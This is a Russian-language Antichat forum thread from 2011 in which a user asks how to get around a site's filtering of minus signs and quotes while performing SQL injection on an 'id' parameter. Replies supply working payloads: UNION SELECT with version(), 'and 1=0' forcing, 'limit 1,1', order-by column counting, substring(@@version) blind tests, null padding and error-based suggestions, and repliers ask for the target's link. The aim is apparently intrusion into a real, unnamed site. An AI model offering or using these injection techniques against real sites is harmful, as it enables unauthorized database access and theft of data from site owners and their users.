HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 11.01.2011, 11:04
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами: 10992741

Репутация: 0
По умолчанию

подскажите как обойти фильтрацию минуса

делаю

Цитата:
Сообщение от None  
id=1+union+select+version(),version(),version(),ve rsion(),version(),version(),version(),version(),ve rsion(),version(),version(),version(),version(),ve rsion(),version(),version(),version(),version(),ve rsion()+--+
поля версии не видно

делаю

Цитата:
Сообщение от None  
id=-1
перенаправляет на главную страницу
 
Ответить с цитированием

  #2  
Старый 11.01.2011, 11:20
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами: 10585560

Репутация: 1550


По умолчанию

Цитата:
Сообщение от noviyuser  
подскажите как обойти фильтрацию минуса
делаю
поля версии не видно
делаю
перенаправляет на главную страницу
limit+1,1
 
Ответить с цитированием

  #3  
Старый 11.01.2011, 11:22
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами: 8885780

Репутация: 672


По умолчанию

noviyuser

зафелси запрос более мягко,

and+1!=1

and+1>2

and+verson()=user()

и тп.

если видны ошибки мускула, попробуй эррор бейсд.
 
Ответить с цитированием

  #4  
Старый 11.01.2011, 11:31
Expl0ited
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами: 8328566

Репутация: 935


По умолчанию

Цитата:
Сообщение от noviyuser  
подскажите как обойти фильтрацию минуса
делаю
поля версии не видно
делаю
перенаправляет на главную страницу
ну по всей же видимости

Код:
id=1+and+1=0+union+select+version(),version(),version(),version(),version(),version(),version(),version(),version(),version(),version(),version(),version(),version(),version(),version(),version(),version(),version()+--+
да и потом, бывают случаи, когда при не совпадении типа выводимых данных срабатывает редирект, по этому конструкция что в твоем запросе (вывод кучи функций version()) не самый верный.
 
Ответить с цитированием

  #5  
Старый 11.01.2011, 11:32
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами: 10992741

Репутация: 0
По умолчанию

точнее сказать не видны выводимые поля т.е. 1,2,3,4 и т.д. или версия version()

ни один из способов не помог

вроде не слепая пробовал

and+substring(@@version,1,1)=4

and+substring(@@version,1,1)=5

пробовал и так и так

id=1+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6, 7,8,9

id=1+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6, 7,8,9+--+

id=1'+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6 ,7,8,9+--+

если ставлю кавычку или минус перенаправляет
 
Ответить с цитированием

  #6  
Старый 11.01.2011, 11:33
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами: 10585560

Репутация: 1550


По умолчанию

link pls
 
Ответить с цитированием

  #7  
Старый 11.01.2011, 12:02
Expl0ited
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами: 8328566

Репутация: 935


По умолчанию

Цитата:
Сообщение от noviyuser  
точнее сказать не видны выводимые поля т.е. 1,2,3,4 и т.д. или версия version()
ни один из способов не помог
вроде не слепая пробовал
and+substring(@@version,1,1)=4
and+substring(@@version,1,1)=5
пробовал и так и так
id=1+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6, 7,8,9
id=1+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6, 7,8,9+--+
id=1'+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6 ,7,8,9+--+
если ставлю кавычку или минус перенаправляет
а как ты пришел к выводу, что там 19 полей?
 
Ответить с цитированием

  #8  
Старый 11.01.2011, 12:16
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами: 10992741

Репутация: 0
По умолчанию

Цитата:
Сообщение от Expl0ited  
а как ты пришел к выводу, что там 19 полей?
order+by+19

на таком перенаправляет

order+by+20

id=1+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6, 7,8,9,20

тоже перенаправляет

null тоже не помогает
 
Ответить с цитированием

  #9  
Старый 11.01.2011, 12:24
Expl0ited
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами: 8328566

Репутация: 935


По умолчанию

Цитата:
Сообщение от noviyuser  
order+by+19
на таком перенаправляет
order+by+20
id=1+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6, 7,8,9,20
тоже перенаправляет
замени цифры на null

[upd] тогда кидай линк.
 
Ответить с цитированием

  #10  
Старый 11.01.2011, 14:36
cheater_man
Постоянный
Регистрация: 13.11.2009
Сообщений: 437
С нами: 8680278

Репутация: 17
По умолчанию

Глупый вопрос:

если я делаю запрос

Код:
www.xxx.ru/auth.php?id=1'
ничего не происходит, открывает ту же самою страницу,

То есть ' фильтруется?

/// Мдаа...
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 6 (пользователей: 0 , гостей: 6)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.